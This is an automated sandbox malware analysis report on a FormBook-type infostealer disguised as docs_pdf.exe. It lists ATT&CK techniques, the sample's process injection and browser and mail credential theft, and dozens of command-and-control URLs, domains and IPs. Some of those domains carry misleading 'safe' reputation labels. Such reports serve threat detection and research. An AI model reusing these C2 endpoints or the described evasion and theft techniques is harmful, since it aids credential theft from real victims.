            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets151
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1472519 Sample: docs_pdf.exe Startdate: 13/07/2024 Architecture: WINDOWS Score: 100 28 www.hectmalt.xyz 2->28 30 yexz60.live 2->30 32 21 other IPs or domains 2->32 42 Snort IDS alert for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 5 other signatures 2->50 10 docs_pdf.exe 4 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 HDtHilbfKZE.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 isoburn.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 HDtHilbfKZE.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.gymroom.online 37.9.175.173, 49725, 49726, 49727 WEBSUPPORT-SRO-SK-ASSK Slovakia (SLOVAK Republic) 22->34 36 www.hectmalt.xyz 203.161.41.207, 49729, 49732, 49733 VNPT-AS-VNVNPTCorpVN Malaysia 22->36 38 8 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            docs_pdf.exe66%ReversingLabsWin32.Backdoor.FormBook
            docs_pdf.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.gymroom.online/9v4b/?D0Pts04=QwF7JlY1PSjHVra+4y9GAkGIkNjMkM0Pe3Kcc1HOimPCQG1R1SgxoF7twkiq9lSaXC7xRVtY7bcnqH/14lNeqyWzLUYbSscBa/GhZ/wr7EAZrjTVHikp9QpcnDnmqECCiEdhejU=&Q8s=tdcd5h7ptjmdxx0%Avira URL Cloudsafe
            http://www.334es.com/8c7z/0%Avira URL Cloudsafe
            http://www.yexz60.live/b58q/?D0Pts04=9y3r5r666D9AuSqeHTwPloJpY6P8Smz3EkVcUHvxQ2YtNmYEvcMAxsdD5dSUMIh6vRZbYKiLrFXGiCp3Pe2iajC50awG1CYTeWFE8FX2P+KAxyDMNwoJDu19IBdamGeoAx/bn7Y=&Q8s=tdcd5h7ptjmdxx0%Avira URL Cloudsafe
            http://www.334es.com/8c7z/?D0Pts04=syard6w4RGgVSvsj/+94Ua9P+14Y627l/jxvjICFtXZ5U2MHVtZOvzhwKMvYk5ST+x5PcETglnXKzlqM+qQVIwI+KCZPvpwqIuyBIvsqSHtYdkfPbGRUiwx+Cm8V2ixEWZMlegI=&Q8s=tdcd5h7ptjmdxx0%Avira URL Cloudsafe
            http://www.evoolihubs.shop/fwdd/?D0Pts04=K/pqHoAOWNF4P+w85wWHM/iowpzI4zdOarJgSNepE9X9MW/JWlOOpIGlAtDTMDCyfqCkO2QB+3/EX24VIjMTM8AeJPJZyoLpuu1Q/5znf4Q/4KQ0LClPCb/j5/YCrPSLvGMpclo=&Q8s=tdcd5h7ptjmdxx0%Avira URL Cloudsafe
            http://www.evoolihubs.shop/fwdd/0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            http://www.hectmalt.xyz/9ntw/?D0Pts04=DF4c4jTIr0uCfSFE8clupTbEYGiU8fGq77V3jsF9odELuFK4p5vQm2AEcbSTGQxVKs+ZCGJ5ndNcuFNuj9dUFu4scKZ8BqW+NctVnA+PUwBNu7O6tttncLZAbI+QrUa9UBZ9fN0=&Q8s=tdcd5h7ptjmdxx0%Avira URL Cloudsafe
            http://www.shaf-kupe-msk.store/8rqd/?D0Pts04=9oZ/y9WNG6tRMVJyjLEcdS0HrpeSaX9AmXAuzSAQ4FjvmAKqYk+BgRtg4p2v1sV9pfbK4NMIa5tejy6Eex1rgQRDwh5vDRupVU05UePYOPUqHSHA96iOT4nNXuXT/C+t5WN5HjI=&Q8s=tdcd5h7ptjmdxx0%Avira URL Cloudsafe
            https://www.evoolihubs.shop/fwdd/?D0Pts04=K/pqHoAOWNF4P0%Avira URL Cloudsafe
            http://www.sodnavisystem.com/5mht/0%Avira URL Cloudsafe
            http://www.mcpcrecycling.com/22y6/?D0Pts04=ICuY/wpnSFLYWqZfe4Os/gHcG43vkkyt4BwQQiH2zV3f9F/XRNyagXQgakBjN0QcNA+3ga87AEREzxLt9aLMOqMkXFbmJEqSPlZqGaa0hprb88Yx6Msm+f4viNx2oGL3e10rb/0=&Q8s=tdcd5h7ptjmdxx0%Avira URL Cloudsafe
            http://411divorce.com/6rlx/?D0Pts04=Q2ZAF0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://www.411divorce.com/6rlx/0%Avira URL Cloudsafe
            http://www.noghteyab.com/wlsq/?D0Pts04=9G9JaQreu1q7pVWdntSqemfrZt4YMEwdEWH52d0+9tQM8/+noicIREkWd/c/vCZ1acCjjeuAo42rGPHTfjnYxH4zd6/SeR7TYZgVkfp3oOFdRtlOKMiyqIOaPcilhWS9JI76xLs=&Q8s=tdcd5h7ptjmdxx0%Avira URL Cloudsafe
            http://www.quixaclienti.com/ch4t/?D0Pts04=zV4psITF3VeqDParSPUqyaC99t0+JvfYyjWfRnGJKOsPmd/sGMCn1Nm1D4KIw/eYCOcCLvh/+vn7ften9OcVQgO4yEfBykK1GR1f38/U+4d5GlEoOVJoTF9oaUkt0L+vFB1wnlQ=&Q8s=tdcd5h7ptjmdxx0%Avira URL Cloudsafe
            http://www.bearclaw.bot/euu6/0%Avira URL Cloudsafe
            http://www.atlpicsstudios.com/8td2/0%Avira URL Cloudsafe
            http://www.shaf-kupe-msk.store/8rqd/0%Avira URL Cloudsafe
            http://www.atlpicsstudios.com/8td2/?D0Pts04=R87owMDlv/gPXB+iq45ci8jcRs8w9bUHCip7gwiELZtoK5wmHa4V63W4EgL8mNHmSVNhYgFtu0cZU8wp9zZh37Cle+WNtKYmdywkjd6RPj5YVKUfFF1M9RdoQRU10akAvSvrp68=&Q8s=tdcd5h7ptjmdxx0%Avira URL Cloudsafe
            http://help.yahoo.com/help/us/ysearch/slurp)0%Avira URL Cloudsafe
            https://www.google.com/recaptcha/api.js?hl=en0%Avira URL Cloudsafe
            http://www.789bet1okvip.solutions/aoam/?D0Pts04=Eo7hyHn30cp3PMowPDjUS1eso/Zba7hHHMc1+Dk3yrF+CAsKksIOHOuhtM05CC/e3HjWlDqziYa3lDzCuMJvVQxsVStEDyJQgF4EVzhIE64C3aguyc8vXyTVrLHS4c+iCk5yFwg=&Q8s=tdcd5h7ptjmdxx0%Avira URL Cloudsafe
            http://www.hectmalt.xyz/9ntw/0%Avira URL Cloudsafe
            http://www.gymroom.online/9v4b/0%Avira URL Cloudsafe
            http://www.sodnavisystem.com/5mht/?D0Pts04=Z08L+geXOaCZa14sbeCJfO+ty3TNCWizhbeG/u0IqvbIpSo6wwwncoz4Fc07Z+7/YVsNS4spfMpi37Q9hxoWZDkaSJlwmX6Cm2C8jVF4FHpqAh5dp062dcYDJG78WF4slIEKgCc=&Q8s=tdcd5h7ptjmdxx0%Avira URL Cloudsafe
            https://301mei.xyz:7788/?u=0%Avira URL Cloudsafe
            http://www.mcpcrecycling.com/22y6/0%Avira URL Cloudsafe
            http://www.411divorce.com/6rlx/?D0Pts04=Q2ZAF+B5MPpYnKblwTws72s1FRS0QoBZYrcwSpUNeInn+zCIhLxwZygB7Wu/ELLY+MlDUKKO21LBMLVVY53W3Ctkqsy7izJexcMbesSkfCBVyo5K3pGetYj3FpCs5hqCFg/EaJo=&Q8s=tdcd5h7ptjmdxx0%Avira URL Cloudsafe
            http://www.quixaclienti.com/ch4t/0%Avira URL Cloudsafe
            http://www.bearclaw.bot/euu6/?D0Pts04=IRrESbehp9A4c0arrNhB2SQGHqYh5p2Ry9/8PtMUjfb6CsHcfdyH5ffjriDVQd7StG/Sopj8DEdssgOk9jRaqOeuB2qzCVXsHxIBR/Jt3DgaUXnoWNbvMCXYX6xoy7VuQx0h7Vc=&Q8s=tdcd5h7ptjmdxx0%Avira URL Cloudsafe
            http://www.789bet1okvip.solutions/aoam/0%Avira URL Cloudsafe
            http://www.sgbet777.org/aiec/0%Avira URL Cloudsafe
            http://www.sgbet777.org0%Avira URL Cloudsafe
            http://wordpress.org/extend/plugins/nginx-helper/faq/0%Avira URL Cloudsafe
            http://www.noghteyab.com/wlsq/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.evoolihubs.shop
            		188.114.96.3
            		truetrue
              		unknown
              www.shaf-kupe-msk.store
              		45.130.41.38
              		truetrue
                		unknown
                bearclaw.bot
                		3.33.130.190
                		truetrue
                  		unknown
                  mcpcrecycling.com
                  		3.33.130.190
                  		truetrue
                    		unknown
                    www.hectmalt.xyz
                    		203.161.41.207
                    		truetrue
                      		unknown
                      quixaclienti.com
                      		3.33.130.190
                      		truetrue
                        		unknown
                        789bet1okvip.solutions
                        		3.33.130.190
                        		truetrue
                          		unknown
                          atlpicsstudios.com
                          		3.33.130.190
                          		truetrue
                            		unknown
                            www.noghteyab.com
                            		51.89.93.192
                            		truetrue
                              		unknown
                              411divorce.com
                              		5.78.41.174
                              		truetrue
                                		unknown
                                sgbet777.org
                                		64.46.102.70
                                		truefalse
                                  		unknown
                                  www.gymroom.online
                                  		37.9.175.173
                                  		truetrue
                                    		unknown
                                    yexz60.live
                                    		3.33.130.190
                                    		truetrue
                                      		unknown
                                      www.sodnavisystem.com
                                      		162.43.105.95
                                      		truetrue
                                        		unknown
                                        www.334es.com
                                        		103.176.91.154
                                        		truetrue
                                          		unknown
                                          www.quixaclienti.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.411divorce.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.yexz60.live
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.sgbet777.org
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.atlpicsstudios.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.mcpcrecycling.com
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.789bet1okvip.solutions
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.bearclaw.bot
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown

                                                          Contacted URLs

                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://www.evoolihubs.shop/fwdd/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.334es.com/8c7z/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.shaf-kupe-msk.store/8rqd/?D0Pts04=9oZ/y9WNG6tRMVJyjLEcdS0HrpeSaX9AmXAuzSAQ4FjvmAKqYk+BgRtg4p2v1sV9pfbK4NMIa5tejy6Eex1rgQRDwh5vDRupVU05UePYOPUqHSHA96iOT4nNXuXT/C+t5WN5HjI=&Q8s=tdcd5h7ptjmdxxtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.evoolihubs.shop/fwdd/?D0Pts04=K/pqHoAOWNF4P+w85wWHM/iowpzI4zdOarJgSNepE9X9MW/JWlOOpIGlAtDTMDCyfqCkO2QB+3/EX24VIjMTM8AeJPJZyoLpuu1Q/5znf4Q/4KQ0LClPCb/j5/YCrPSLvGMpclo=&Q8s=tdcd5h7ptjmdxxtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.334es.com/8c7z/?D0Pts04=syard6w4RGgVSvsj/+94Ua9P+14Y627l/jxvjICFtXZ5U2MHVtZOvzhwKMvYk5ST+x5PcETglnXKzlqM+qQVIwI+KCZPvpwqIuyBIvsqSHtYdkfPbGRUiwx+Cm8V2ixEWZMlegI=&Q8s=tdcd5h7ptjmdxxtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.hectmalt.xyz/9ntw/?D0Pts04=DF4c4jTIr0uCfSFE8clupTbEYGiU8fGq77V3jsF9odELuFK4p5vQm2AEcbSTGQxVKs+ZCGJ5ndNcuFNuj9dUFu4scKZ8BqW+NctVnA+PUwBNu7O6tttncLZAbI+QrUa9UBZ9fN0=&Q8s=tdcd5h7ptjmdxxtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.yexz60.live/b58q/?D0Pts04=9y3r5r666D9AuSqeHTwPloJpY6P8Smz3EkVcUHvxQ2YtNmYEvcMAxsdD5dSUMIh6vRZbYKiLrFXGiCp3Pe2iajC50awG1CYTeWFE8FX2P+KAxyDMNwoJDu19IBdamGeoAx/bn7Y=&Q8s=tdcd5h7ptjmdxxtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.gymroom.online/9v4b/?D0Pts04=QwF7JlY1PSjHVra+4y9GAkGIkNjMkM0Pe3Kcc1HOimPCQG1R1SgxoF7twkiq9lSaXC7xRVtY7bcnqH/14lNeqyWzLUYbSscBa/GhZ/wr7EAZrjTVHikp9QpcnDnmqECCiEdhejU=&Q8s=tdcd5h7ptjmdxxtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.411divorce.com/6rlx/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.sodnavisystem.com/5mht/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.mcpcrecycling.com/22y6/?D0Pts04=ICuY/wpnSFLYWqZfe4Os/gHcG43vkkyt4BwQQiH2zV3f9F/XRNyagXQgakBjN0QcNA+3ga87AEREzxLt9aLMOqMkXFbmJEqSPlZqGaa0hprb88Yx6Msm+f4viNx2oGL3e10rb/0=&Q8s=tdcd5h7ptjmdxxtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.atlpicsstudios.com/8td2/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.quixaclienti.com/ch4t/?D0Pts04=zV4psITF3VeqDParSPUqyaC99t0+JvfYyjWfRnGJKOsPmd/sGMCn1Nm1D4KIw/eYCOcCLvh/+vn7ften9OcVQgO4yEfBykK1GR1f38/U+4d5GlEoOVJoTF9oaUkt0L+vFB1wnlQ=&Q8s=tdcd5h7ptjmdxxtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.noghteyab.com/wlsq/?D0Pts04=9G9JaQreu1q7pVWdntSqemfrZt4YMEwdEWH52d0+9tQM8/+noicIREkWd/c/vCZ1acCjjeuAo42rGPHTfjnYxH4zd6/SeR7TYZgVkfp3oOFdRtlOKMiyqIOaPcilhWS9JI76xLs=&Q8s=tdcd5h7ptjmdxxtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.bearclaw.bot/euu6/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.shaf-kupe-msk.store/8rqd/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.atlpicsstudios.com/8td2/?D0Pts04=R87owMDlv/gPXB+iq45ci8jcRs8w9bUHCip7gwiELZtoK5wmHa4V63W4EgL8mNHmSVNhYgFtu0cZU8wp9zZh37Cle+WNtKYmdywkjd6RPj5YVKUfFF1M9RdoQRU10akAvSvrp68=&Q8s=tdcd5h7ptjmdxxtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.789bet1okvip.solutions/aoam/?D0Pts04=Eo7hyHn30cp3PMowPDjUS1eso/Zba7hHHMc1+Dk3yrF+CAsKksIOHOuhtM05CC/e3HjWlDqziYa3lDzCuMJvVQxsVStEDyJQgF4EVzhIE64C3aguyc8vXyTVrLHS4c+iCk5yFwg=&Q8s=tdcd5h7ptjmdxxtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.hectmalt.xyz/9ntw/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.gymroom.online/9v4b/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.sodnavisystem.com/5mht/?D0Pts04=Z08L+geXOaCZa14sbeCJfO+ty3TNCWizhbeG/u0IqvbIpSo6wwwncoz4Fc07Z+7/YVsNS4spfMpi37Q9hxoWZDkaSJlwmX6Cm2C8jVF4FHpqAh5dp062dcYDJG78WF4slIEKgCc=&Q8s=tdcd5h7ptjmdxxtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.mcpcrecycling.com/22y6/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.411divorce.com/6rlx/?D0Pts04=Q2ZAF+B5MPpYnKblwTws72s1FRS0QoBZYrcwSpUNeInn+zCIhLxwZygB7Wu/ELLY+MlDUKKO21LBMLVVY53W3Ctkqsy7izJexcMbesSkfCBVyo5K3pGetYj3FpCs5hqCFg/EaJo=&Q8s=tdcd5h7ptjmdxxtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.bearclaw.bot/euu6/?D0Pts04=IRrESbehp9A4c0arrNhB2SQGHqYh5p2Ry9/8PtMUjfb6CsHcfdyH5ffjriDVQd7StG/Sopj8DEdssgOk9jRaqOeuB2qzCVXsHxIBR/Jt3DgaUXnoWNbvMCXYX6xoy7VuQx0h7Vc=&Q8s=tdcd5h7ptjmdxxtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.quixaclienti.com/ch4t/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.789bet1okvip.solutions/aoam/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.sgbet777.org/aiec/false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.noghteyab.com/wlsq/true
                                                          • Avira URL Cloud: safe
                                                          		unknown

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://duckduckgo.com/chrome_newtabisoburn.exe, 00000005.00000002.4555382292.000000000788E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://duckduckgo.com/ac/?q=isoburn.exe, 00000005.00000002.4555382292.000000000788E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://411divorce.com/6rlx/?D0Pts04=Q2ZAFisoburn.exe, 00000005.00000002.4553311671.00000000066AE000.00000004.10000000.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000002.4551468218.000000000462E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=isoburn.exe, 00000005.00000002.4555382292.000000000788E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=isoburn.exe, 00000005.00000002.4555382292.000000000788E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://www.ecosia.org/newtab/isoburn.exe, 00000005.00000002.4555382292.000000000788E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://www.evoolihubs.shop/fwdd/?D0Pts04=K/pqHoAOWNF4Pisoburn.exe, 00000005.00000002.4553311671.0000000005ED4000.00000004.10000000.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000002.4551468218.0000000003E54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://ac.ecosia.org/autocomplete?q=isoburn.exe, 00000005.00000002.4555382292.000000000788E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://www.google.com/recaptcha/api.js?hl=enisoburn.exe, 00000005.00000002.4553311671.0000000005BB0000.00000004.10000000.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000002.4551468218.0000000003B30000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://help.yahoo.com/help/us/ysearch/slurp)firefox.exe, 0000000A.00000002.2775625932.0000020038AA0000.00000040.80000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchisoburn.exe, 00000005.00000002.4555382292.000000000788E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://301mei.xyz:7788/?u=isoburn.exe, 00000005.00000002.4555303639.00000000075E0000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4553311671.000000000651C000.00000004.10000000.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000002.4551468218.000000000449C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=isoburn.exe, 00000005.00000002.4555382292.000000000788E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.sgbet777.orgHDtHilbfKZE.exe, 00000007.00000002.4553969990.00000000052B3000.00000040.80000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://wordpress.org/extend/plugins/nginx-helper/faq/isoburn.exe, 00000005.00000002.4553311671.00000000066AE000.00000004.10000000.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000002.4551468218.000000000462E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          5.78.41.174
                                                          		411divorce.comIran (ISLAMIC Republic Of)
                                                          		16322PARSONLINETehran-IRANIRtrue
                                                          51.89.93.192
                                                          		www.noghteyab.comFrance
                                                          		16276OVHFRtrue
                                                          162.43.105.95
                                                          		www.sodnavisystem.comUnited States
                                                          		11333CYBERTRAILSUStrue
                                                          188.114.96.3
                                                          		www.evoolihubs.shopEuropean Union
                                                          		13335CLOUDFLARENETUStrue
                                                          37.9.175.173
                                                          		www.gymroom.onlineSlovakia (SLOVAK Republic)
                                                          		51013WEBSUPPORT-SRO-SK-ASSKtrue
                                                          203.161.41.207
                                                          		www.hectmalt.xyzMalaysia
                                                          		45899VNPT-AS-VNVNPTCorpVNtrue
                                                          45.130.41.38
                                                          		www.shaf-kupe-msk.storeRussian Federation
                                                          		198610BEGET-ASRUtrue
                                                          3.33.130.190
                                                          		bearclaw.botUnited States
                                                          		8987AMAZONEXPANSIONGBtrue
                                                          64.46.102.70
                                                          		sgbet777.orgUnited States
                                                          		26163DATAGRAMUSfalse
                                                          103.176.91.154
                                                          		www.334es.comunknown
                                                          		7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue

                                                          General Information

                                                          Joe Sandbox version:40.0.0 Tourmaline
                                                          Analysis ID:1472519
                                                          Start date and time:2024-07-13 00:01:08 +02:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 10m 12s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:11
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:2
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:docs_pdf.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@7/5@16/10
                                                          EGA Information:
                                                          • Successful, ratio: 75%
                                                          HCA Information:
                                                          • Successful, ratio: 96%
                                                          • Number of executed functions: 58
                                                          • Number of non-executed functions: 273
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Execution Graph export aborted for target HDtHilbfKZE.exe, PID 4544 because it is empty
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • VT rate limit hit for: docs_pdf.exe

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          18:03:11API Interceptor12997360x Sleep call for process: isoburn.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          5.78.41.174SHIPPING DOCS_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • www.411divorce.com/6rlx/?mv0D=Q2ZAF+B5MPpYnKbk8zx56B5rL1aOA7pZYrcwSpUNeInn+zCIhLxwZygB7Wu/ELLY+MlDUKKO21LBMLVVY53WlSV2qsC0iw14ssBnKMCkfzBn744B3pSPmJk=&Jj=kpS8
                                                          purchase order_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • www.411divorce.com/6rlx/?MdEl=Q2ZAF+B5MPpYnKbk8zx56B5rL1aOA7pZYrcwSpUNeInn+zCIhLxwZygB7Wu/ELLY+MlDUKKO21LBMLVVY53WlSV2qsC0iw14ssBnKMCkfzBn744B3pSPmJk=&cv4D=Bv0xSH88iTF48zS0
                                                          51.89.93.192Document.exeGet hashmaliciousFormBookBrowse
                                                          • www.noghteyab.com/f97t/
